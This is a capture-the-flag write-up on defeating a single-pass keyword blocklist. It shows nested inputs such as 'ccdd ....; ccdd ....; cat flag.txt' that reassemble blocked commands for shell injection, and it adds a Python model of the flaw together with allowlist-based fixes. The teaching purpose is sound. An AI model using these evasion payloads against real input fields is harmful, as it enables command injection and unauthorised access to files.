We have an input field. Giving it input such as ccccdddd returns What I See ◔_◔ cccddd, which indicates that some kind of filter is running in the background. Our task now is to identify the filtering rules.
From observation, filters apply to cd, ls and d..
Getting only cd back means .. got removed
Got cd .. back
No output on ls means ls is being removed
llss worked
So finally our queries go as follows
- llss (nothing readable or useful, so move up a directory)
- ccdd ....; llss (nothing in injection base, so move up again)
- ccdd ....; ccdd ....; llss (flag file visible)
And the final query to get the flag is:
- ccdd ....; ccdd ....; cat flag.txt
Hints with point values (cost):
- Hint 1: "aabcbc".replace("abc","") = abc (50 pts)
- Hint 2 (100 pts):
  - ls is replaced by NULL
  - cd is replaced by NULL
  - d .. is replaced by d
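
The behaviour in the hints can be reproduced with a small model of the filter. This is an added example, not the challenge's own code: the function names are hypothetical, and the third rule is modelled as "d .." becoming "d " (space kept), an assumption made so the model matches the output observed above. It shows why a single-pass blocklist lets nested keywords reassemble, and compares it with re-applying the rules until stable and with an allowlist check.

```python
import re

# Rules taken from Hint 2. The third one is modelled as "d .." -> "d "
# (trailing space kept); that detail is an assumption, not from the page.
RULES = [("ls", ""), ("cd", ""), ("d ..", "d ")]


def single_pass_filter(text):
    """Apply every rule exactly once, as the challenge filter appears to do."""
    for needle, replacement in RULES:
        text = text.replace(needle, replacement)
    return text


def stable_filter(text):
    """Re-apply the rules until nothing changes, so that removing one
    keyword cannot leave a freshly assembled keyword behind."""
    while True:
        filtered = single_pass_filter(text)
        if filtered == text:
            return filtered
        text = filtered


# Allowlist alternative: accept only what the field is meant to carry.
# The pattern is a constructed example (a short alphanumeric identifier).
ALLOWED = re.compile(r"[A-Za-z0-9_-]{1,32}")


def is_allowed(text):
    """Reject anything outside the allowlist instead of trying to clean it."""
    return ALLOWED.fullmatch(text) is not None


if __name__ == "__main__":
    # Inputs below are the ones quoted in the write-up.
    for sample in ["ccccdddd", "llss", "ccdd ....; ccdd ....; llss"]:
        print(repr(sample))
        print("  single pass :", repr(single_pass_filter(sample)))
        print("  until stable:", repr(stable_filter(sample)))
        print("  allowlisted :", is_allowed(sample))
```

Even the stable version leaves the ; separator in place, so the reliable fixes are the allowlist check and not handing user input to a shell at all.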